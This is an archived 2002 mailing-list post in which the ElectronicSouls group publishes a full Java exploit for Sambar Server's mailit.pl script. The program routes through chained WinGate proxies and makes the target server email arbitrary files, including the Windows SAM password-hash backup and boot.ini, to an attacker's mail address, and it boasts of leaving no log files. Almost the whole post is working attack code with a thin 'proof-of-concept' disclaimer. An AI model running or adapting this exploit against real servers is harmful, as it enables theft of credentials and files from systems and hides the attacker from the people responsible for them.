lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200211291721.gATHLE9J053322@mailserver3.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Sambar Exploit

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Here is an exploit for Sambar Server's mailit.pl, written in JAVA.  we
were taught JAVA by KF[0dd], the internet's premier exploit writing
genius, and technical support to most ADM/0dd exploits.

# cat  SambarMailit.java
/*---Written by Craig[TM]--- Electronicsouls-2001
 * This little java Exploit will use Sambar Servers' mailit.pl
 * to send any file to your eMail address.
 *
 * To use this, you need a...
 *
 * - mail relay
 * - secure eMail address (http://www.hushmail.com)
 * - java compiler and a Sambar Server<=4.2 with mailit.pl of course
 *
 * When using WinGates, separate them with "," like this:
 * Enter Wingate/s>127.0.0.1,192.168.0.10,192.168.0.1
 *
 * This exploit should leave NO logfiles - well, at least on my own server it did not!
 *
 *
 * BTW:I dunno if I may call this '0day' - somewhere on
 * a blackhead website i found a hint that there was an issue with
 * mailit.pl, so I figured it out...
 *
 *
 *  [Craig]
 *
 *  He...don't use this to deface...this is proof-of-concept code only!
 *
 * Last thing: BE PATIENT...THE EXPLOIT NEEDS SOME TIME TO RUN!
 *
 */

import java.io.*;
import java.net.*;
import java.util.*;

public class SambarMailit
 {

        //line from server that is read in
        static String line="";

        //arrays for wingates
 static String Wingates[]=new String[100];

        //vars for the user input from console
        static String SMTPServer;
  static String Server;
  static String File;
        static String eMail;

        //the shit for the socket ;)
        static DataInputStream in = new DataInputStream (System.in);
        static DataInputStream sin;
  static PrintStream sout;
  static Socket s=null;

        //some "switches" int the program
        static boolean useWingates=false;
  static int Mode;


 //the user menu
 void HoleModus()
        {
   try
        {
                 System.out.println("What do you want?");
           System.out.println("(1) send me C:\\winnt\\repair\\sam._");
           System.out.println("(2) send me C:\\boot.ini");
           System.out.println("(3) send me a file I want");
           System.out.println("(4) quit");
           System.out.print(">");

                  DataInputStream in = new DataInputStream (System.in);
                  String raw=in.readLine();
                  Mode=Integer.valueOf(raw).intValue();
                  if (Mode<1 || Mode>4 || Mode%1!=0)
                 {System.out.println("invalid option! quitting...");System.exit(0);}

                  if (Mode==4)System.exit(0);

                  System.out.print("\n");

                }//try
     catch (IOException e) {System.out.println("Error reading input from Console:"+e);}
        }//get()






 //ask user for server
 void HoleServer()
        {
   try
        {
                  System.out.print("Enter Server>");

                  DataInputStream in = new DataInputStream (System.in);
                  Server=in.readLine();

                }//try
     catch (IOException e) {System.out.println("Error reading input from Console:"+e);}
        }//get()




 //ask user for wingates - i would strongly suggest to use this!
 void HoleWingates()
        {
         try
        {
                  System.out.print("Enter Wingate/s>");

                  DataInputStream in = new DataInputStream (System.in);
                  String WingatesRaw=in.readLine();

                  StringTokenizer token = new StringTokenizer(WingatesRaw, ",");
      int num_tokens = token.countTokens();
            for (int i = 0;i< num_tokens;i++)
             {
                Wingates[i]=token.nextToken();
              Wingates[i]=Wingates[i].trim();
             }

                  if (Wingates[0]!=null && Wingates[0]!="")useWingates=true;

                 //for (int i=0;Wingates[i]!=null;i++)System.out.println("Wingate["+i+"]:"+Wingates[i]);

                }//try
     catch (IOException e) {System.out.println("Error with your Wingates:"+e);}

  }//HoleWingates




 //ask user where to download and so on...
 void HoleOptions()
  {
   try
        {

         System.out.print("Mail relay>");
             in = new DataInputStream (System.in);
             SMTPServer=in.readLine();

             System.out.print("My eMail>");
             in = new DataInputStream (System.in);
             eMail=in.readLine();


         if (Mode==3)
                  {
         System.out.print("File to send>");
               DataInputStream in = new DataInputStream (System.in);
               File=in.readLine();
                        }


        }
        catch (IOException e){System.out.println("Error reading input from Console:"+e);}

        }//


 //connect to the server with or without WinGates
 void Verbinde()
        {
         try
                {

           if (useWingates==true)
                        {
             s = new Socket(Wingates[0], 23);
             sin = new DataInputStream (s.getInputStream());
             sout = new PrintStream (s.getOutputStream());

                 for (int i=1;Wingates[i]!=null;i++)
              {
         System.out.println("Trying to connect to "+Wingates[i]+"...");
               sout.println(Wingates[i]+" 23");
         line=sin.readLine();
         System.out.println(line);
        }

             System.out.println("Now trying to connect to "+Server+":80...");
             sout.println(Server+" 80");
             System.out.println((line=sin.readLine()));
                        }

           else
                        {
             s = new Socket(Server, 80);
             sin = new DataInputStream (s.getInputStream());
             sout = new PrintStream (s.getOutputStream());
                        }

    }//try
   catch (IOException e){System.out.println("Error Connecting:"+e);}

        }//verbinde()





 //main program
 public static void main(String[] args)
        {
         System.out.println("\nCraig's Sambar<=4.2 (0day?) mailit.pl Exploit");
         SambarMailit Sam=new SambarMailit();

         Sam.HoleModus();
         Sam.HoleServer();
         Sam.HoleWingates();
         Sam.HoleOptions();

  try
         {

     if (Mode==1)File="C:\\winnt\\repair\\sam._";
     if (Mode==2)File="C:\\boot.ini";

           Sam.Verbinde();

      sout.println("POST /cgi-bin/mailit.pl HTTP/1.1");
      sout.println("Content-Type: application/x-www-form-urlencoded");
      sout.println("User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)");
      sout.println("Host: "+Server);

      //for the POST command, we need to know the exact length of data to send
      int l=72+Server.length()+SMTPServer.length()+eMail.length()+File.length();

      sout.println("Content-Length: "+l);
      sout.println("Connection: Keep-Alive\n");
        sout.println("server="+SMTPServer+"&recipient="+eMail+"&body=Phile4U&attach="+File/*C%3A%5Cwinnt%5Crepai
r%5Csam._*/+"&from=hacked@"+Server+"&subject=Sambar-File");

          System.out.println();

          while (true)
                 {

            line=sin.readLine();
            if (line==null)break;
            System.out.println(line);

            if (line.indexOf("MailIt Failed")>-1)
                {System.out.println("ERROR!\n\n");break;}
          if (line.indexOf("MailIt Succeeded.")>-1)
                {System.out.println("SUCCESS!\n\n");break;}

                 }


          s.close();

   }//try
  catch (IOException e){System.out.println("Error!:"+e);}

        }//public

}//class

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Short Music For Short People."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nohoMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltZQIAoID2JahMWrfN
jLArXryWRpZJuKjVAKC+RHRdI7jWnflBbiJVMfmEB1SOOA==
=8b73
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ